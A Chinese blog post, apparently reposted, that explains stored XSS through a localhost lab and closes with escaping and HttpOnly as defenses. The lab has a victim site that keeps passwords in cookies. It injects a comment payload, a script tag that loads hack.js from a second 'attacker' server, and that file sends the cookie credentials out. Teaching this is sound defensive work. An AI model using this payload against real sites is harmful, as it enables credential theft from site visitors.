Stored XSS攻击

短命女 2022-01-05 21:09 430阅读 0赞

XSS(Cross Site Scripting)

即跨域脚本攻击，向被攻击网站注入恶意脚本，恶意脚本获取到数据发送到另外一个域的网站上。

Stored XSS攻击

即存储式XSS攻击。

把恶意脚本存储到被攻击者的网站的数据库。

其他人访问数据库中的恶意脚本代码后，浏览器执行恶意脚本，被攻击。

存储式攻击不止一次攻击，并且被攻击的人不止一个，影响范围大。

Stored XSS攻击实例

思路

1.通过nodeJS在后端开启两个不同端口的服务，即两个不同域的站点。

2.被攻击者网站

a:在登录时，把用户的用户名、密码信息存入cookie中

b.有一个评论功能，用户在文本框内输入评论信息，然后提交到服务器。

3.攻击者在评论处输入<script src='hack.js'></script>,点击提交后这段脚本存入到数据库

hack.js文件是攻击者网站的js脚本文件，用来获取用户的cookie中的用户名、密码信息，并且把用户名、密码发送到攻击者指定的网站。

4.当网站的用户访问带有评论<script src='hack.js'></script>信息时，会下载hack.js文件，并且执行，网站被攻击。

注意：若返回的是包含<script src='hack.js'></script>内容的静态html文件，此段代码会执行。

若使用ajax获取评论信息，然后通过innerHTML方法把<script src='hack.js'></script>添加到html文件，此段代码不执行。innerHTML会把<script src='hack.js'>

</script> 当作字符串来处理，攻击失效。

实验

文件结构

![934243-20170301014129485-594128016.png][]

server.js为服务端，创建了两个http服务，端口分别为3000, 3100。

hackedsite为被攻击的站点，运行在3000端口中。

a.index.html为登录页。

b.为评论信息页。

c.为获取评论信息页。

hacksite为攻击的站点，运行在3100端口中。

a.hack.js为嵌入在被攻击网站的恶意脚本

b.remote.js用于协助hack.js把获取到的数据发送到hacksite站点。

过程

1.使用nodeJS搭建本地服务器，启动两个不同端口的服务，端口分别为3000,3100。

server1.listen(3000);

server2.listen(3100);

2.访问urlhttp://localhost:3000/hackedsite/index.html进入登录页面，并且输入用户名、密码

![934243-20170301014709095-1605109006.png][]

点击登录按钮后，把用户名、密码存储到cookie中，并且跳转到评论页面。

3.进入评论页面，在评论中输入<script src="http://localhost:3100/hacksite/hack.js"></script>

![934243-20170301015005454-16474254.png][]

点击提交后，评论信息存储到数据库，并且重定向到显示评论信息页面。

4.显示评论信息页面

![934243-20170301015503470-1647615038.png][]

第三条内容为<script src="http://localhost:3100/hacksite/hack.js"></script>，被浏览器解析执行。

html为:

![934243-20170301021044391-1125469140.png][]

上面的html片段返回为静态的浏览器解析script标签，若通过ajax获取评论数据，通过innerHTML添加的，则script标签不解析执行，当作字符串来处理。

hack.js文件获取被攻击网站的cookie中存储的数据，并且发送到指定的站点。

hack.js是如何工作的

![934243-20170301021013345-1953087390.png][]

1.首先获取被攻击站点的cookie中的用户名、密码

2.借助<script>标签把获取到的用户名、密码信息发送到攻击者站点，这样，就能窃取到被攻击者的登录信息了。

sessionId

http是一种无状态的协议，为了记录一个会话周期，通过sessionId来记录会话过程。sessionId通过cookie传递到服务端，也可通过XSS攻击获取sessionId,从而使攻击者获得登陆网站的权限。

防御

(1)转义

(2)HttpOnly

如果在cookie中设置了HttpOnly属性，那么通过程序(JS脚本、Applet等）将无法读取到cookie信息，这样能有效防止XSS攻击。cookie通常在http头中传输。

cookie为字符串格式:key=value;Expires=date;Path=path;Domain=domain;Secure;HttpOnly

[代码地址][Link 1]

转载于:https://www.cnblogs.com/fe-huahai/p/6482672.html

[934243-20170301014129485-594128016.png]: /images/20211228/f212c2cfe7204fc5a32bab95f1a6ec0c.png
[934243-20170301014709095-1605109006.png]: /images/20211228/9e877b9b6c1d429c9a57a433ae693239.png
[934243-20170301015005454-16474254.png]: /images/20211228/0eaad9b078674d5ea987b877cb9a1945.png
[934243-20170301015503470-1647615038.png]: /images/20211228/883d2f7c419f4beda57dc66dd069a0bb.png
[934243-20170301021044391-1125469140.png]: /images/20211228/4a6bb4f78cb24f0b8b1afedc35f900cc.png
[934243-20170301021013345-1953087390.png]: /images/20211228/a747e812c09942bfaa68e8aec1c3e5da.png
[Link 1]: https://github.com/spring-fe/xss-hack